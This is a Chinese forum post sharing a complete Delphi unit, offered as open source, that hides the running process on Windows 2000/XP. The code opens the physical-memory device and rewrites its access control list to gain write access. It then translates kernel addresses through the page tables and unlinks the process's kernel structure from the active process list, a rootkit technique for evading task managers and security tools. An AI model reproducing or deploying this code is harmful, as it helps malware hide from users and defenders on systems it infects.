【开源】隐藏进程代码DELPHI版
<p>unit HideProcess;<br/><br/>interface<br/><br/>function MyHideProcess: Boolean;<br/><br/>implementation<br/><br/>uses<br/> Windows,<br/> Classes, AclAPI, accCtrl;<br/><br/>type<br/> NTSTATUS = LongInt;<br/><br/>const<br/> //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)<br/> STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);<br/> STATUS_ACCESS_DENIED = NTSTATUS($C0000022);<br/> OBJ_INHERIT = $00000002;<br/> OBJ_PERMANENT = $00000010;<br/> OBJ_EXCLUSIVE = $00000020;<br/> OBJ_CASE_INSENSITIVE = $00000040;<br/> OBJ_OPENIF = $00000080;<br/> OBJ_OPENLINK = $00000100;<br/> OBJ_KERNEL_HANDLE = $00000200;<br/> OBJ_VALID_ATTRIBUTES = $000003F2;<br/><br/>type<br/> PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;<br/> IO_STATUS_BLOCK = record<br/> Status: NTSTATUS;<br/> FObject: DWORD;<br/> end;<br/><br/> PUNICODE_STRING = ^UNICODE_STRING;<br/> UNICODE_STRING = record<br/> Length: Word;<br/> MaximumLength: Word;<br/> Buffer: PWideChar;<br/> end;<br/><br/> POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;<br/> OBJECT_ATTRIBUTES = record<br/> Length: DWORD;<br/> RootDirectory: Pointer;<br/> ObjectName: PUNICODE_STRING;<br/> Attributes: DWORD;<br/> SecurityDescriptor: Pointer;<br/> SecurityQualityOfService: Pointer;<br/> end;<br/><br/> TZwOpenSection = function(SectionHandle: PHandle;<br/> DesiredAccess: ACCESS_MASK;<br/> ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;<br/> TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;<br/> SourceString: PWideChar); stdcall;<br/><br/>var<br/> RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;<br/> ZwOpenSection: TZwOpenSection = nil;<br/> g_hNtDLL: THandle = 0;<br/> g_pMapPhysicalMemory: Pointer = nil;<br/> g_hMPM: THandle = 0;<br/> g_hMPM2: THandle = 0;<br/> g_osvi: OSVERSIONINFO;<br/> b_hide: Boolean = false;<br/>//---------------------------------------------------------------------------<br/><br/>function InitNTDLL: Boolean;<br/>begin<br/> g_hNtDLL := LoadLibrary('ntdll.dll');<br/><br/> if 0 = g_hNtDLL then<br/> begin<br/> Result := false;<br/> Exit;<br/> end;<br/><br/> RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');<br/> ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');<br/><br/> Result := True;<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>procedure CloseNTDLL;<br/>begin<br/> if (0 <> g_hNtDLL) then<br/> FreeLibrary(g_hNtDLL);<br/> g_hNtDLL := 0;<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);<br/>var<br/> pDacl: PACL;<br/> pSD: PPSECURITY_DESCRIPTOR;<br/> pNewDacl: PACL;<br/> dwRes: DWORD;<br/> ea: EXPLICIT_ACCESS;<br/>begin<br/> pDacl := nil;<br/> pSD := nil;<br/> pNewDacl := nil;<br/><br/> dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);<br/><br/> if ERROR_SUCCESS <> dwRes then<br/> begin<br/> if Assigned(pSD) then<br/> LocalFree(Hlocal(pSD^));<br/> if Assigned(pNewDacl) then<br/> LocalFree(HLocal(pNewDacl));<br/> end;<br/><br/> ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));<br/> ea.grfAccessPermissions := SECTION_MAP_WRITE;<br/> ea.grfAccessMode := GRANT_ACCESS;<br/> ea.grfInheritance := NO_INHERITANCE;<br/> ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;<br/> ea.Trustee.TrusteeType := TRUSTEE_IS_USER;<br/> ea.Trustee.ptstrName := 'CURRENT_USER';<br/><br/> dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);<br/><br/> if ERROR_SUCCESS <> dwRes then<br/> begin<br/> if Assigned(pSD) then<br/> LocalFree(Hlocal(pSD^));<br/> if Assigned(pNewDacl) then<br/> LocalFree(HLocal(pNewDacl));<br/> end;<br/><br/> dwRes := SetSecurityInfo<br/><br/> (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);<br/><br/> if ERROR_SUCCESS <> dwRes then<br/> begin<br/> if Assigned(pSD) then<br/> LocalFree(Hlocal(pSD^));<br/> if Assigned(pNewDacl) then<br/> LocalFree(HLocal(pNewDacl));<br/> end;<br/><br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>function OpenPhysicalMemory: THandle;<br/>var<br/> status: NTSTATUS;<br/> physmemString: UNICODE_STRING;<br/> attributes: OBJECT_ATTRIBUTES;<br/> PhyDirectory: DWORD;<br/>begin<br/> g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);<br/> GetVersionEx(g_osvi);<br/><br/> if (5 <> g_osvi.dwMajorVersion) then<br/> begin<br/> Result := 0;<br/> Exit;<br/> end;<br/><br/> case g_osvi.dwMinorVersion of<br/> 0: PhyDirectory := $30000;<br/> 1: PhyDirectory := $39000;<br/> else<br/> begin<br/> Result := 0;<br/> Exit;<br/> end;<br/> end;<br/><br/> RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');<br/><br/> attributes.Length := SizeOf(OBJECT_ATTRIBUTES);<br/> attributes.RootDirectory := nil;<br/> attributes.ObjectName := @physmemString;<br/> attributes.Attributes := 0;<br/> attributes.SecurityDescriptor := nil;<br/> attributes.SecurityQualityOfService := nil;<br/><br/> status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);<br/><br/> if (status = STATUS_ACCESS_DENIED) then<br/> begin<br/> ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);<br/> SetPhyscialMemorySectionCanBeWrited(g_hMPM);<br/> CloseHandle(g_hMPM);<br/><br/> status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);<br/> end;<br/><br/> if not (LongInt(status) >= 0) then<br/> begin<br/> Result := 0;<br/> Exit;<br/> end;<br/><br/> g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,<br/> FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);<br/><br/> if (g_pMapPhysicalMemory = nil) then<br/> begin<br/> Result := 0;<br/> Exit;<br/> end;<br/><br/> Result := g_hMPM;<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;<br/>var<br/> VAddr, PGDE, PTE, PAddr, tmp: DWORD;<br/>begin<br/> VAddr := DWORD(addr);<br/>// PGDE := BaseAddress;<br/> PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // modify by dot.<br/><br/> if 0 = (PGDE and 1) then<br/> begin<br/> Result := nil;<br/> Exit;<br/> end;<br/><br/> tmp := PGDE and $00000080;<br/><br/> if (0 <> tmp) then<br/> begin<br/> PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);<br/> end<br/> else<br/> begin<br/> PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));<br/>// PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];<br/> PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // modify by dot.<br/><br/> if (0 = (PTE and 1)) then<br/> begin<br/> Result := nil;<br/> Exit;<br/> end;<br/><br/> PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);<br/> UnmapViewOfFile(Pointer(PGDE));<br/> end;<br/><br/> Result := Pointer(PAddr);<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>function GetData(addr: Pointer): DWORD;<br/>var<br/> phys, ret: DWORD;<br/> tmp: PDWORD;<br/>begin<br/> phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));<br/> tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,<br/> phys and $FFFFF000, $1000));<br/><br/> if (nil = tmp) then<br/> begin<br/> Result := 0;<br/> Exit;<br/> end;<br/><br/>// ret := tmp[(phys and $FFF) shr 2];<br/> ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // modify by dot.<br/> UnmapViewOfFile(tmp);<br/><br/> Result := ret;<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>function SetData(addr: Pointer; data: DWORD): Boolean;<br/>var<br/> phys: DWORD;<br/> tmp: PDWORD;<br/>begin<br/> phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));<br/> tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));<br/><br/> if (nil = tmp) then<br/> begin<br/> Result := false;<br/> Exit;<br/> end;<br/><br/>// tmp[(phys and $FFF) shr 2] := data;<br/> PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // modify by dot.<br/> UnmapViewOfFile(tmp);<br/><br/> Result := TRUE;<br/>end;<br/>//---------------------------------------------------------------------------<br/>{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)<br/>begin<br/>ExitProcess(0);<br/>return 1 ;<br/>end }<br/>//---------------------------------------------------------------------------<br/><br/>function YHideProcess: Boolean;<br/>var<br/> thread, process: DWORD;<br/> fw, bw: DWORD;<br/>begin<br/>// SetUnhandledExceptionFilter(exeception);<br/> if (FALSE = InitNTDLL) then<br/> begin<br/> Result := FALSE;<br/> Exit;<br/> end;<br/><br/> if (0 = OpenPhysicalMemory) then<br/> begin<br/> Result := FALSE;<br/> Exit;<br/> end;<br/><br/> thread := GetData(Pointer($FFDFF124)); //kteb<br/> process := GetData(Pointer(thread + $44)); //kpeb<br/><br/> if (0 = g_osvi.dwMinorVersion) then<br/> begin<br/> fw := GetData(Pointer(process + $A0));<br/> bw := GetData(Pointer(process + $A4));<br/><br/> SetData(Pointer(fw + 4), bw);<br/> SetData(Pointer(bw), fw);<br/><br/> Result := TRUE;<br/> end<br/> else if (1 = g_osvi.dwMinorVersion) then<br/> begin<br/> fw := GetData(Pointer(process + $88));<br/> bw := GetData(Pointer(process + $8C));<br/><br/> SetData(Pointer(fw + 4), bw);<br/> SetData(Pointer(bw), fw);<br/><br/> Result := TRUE;<br/> end<br/> else<br/> begin<br/> Result := False;<br/> end;<br/><br/> CloseHandle(g_hMPM);<br/> CloseNTDLL;<br/>end;<br/><br/>function MyHideProcess: Boolean;<br/>begin<br/> if not b_hide then<br/> begin<br/> b_hide := YHideProcess;<br/> end;<br/><br/> Result := b_hide;<br/>end;<br/><br/>end.</p> 贴纸乱码了
页:
[1]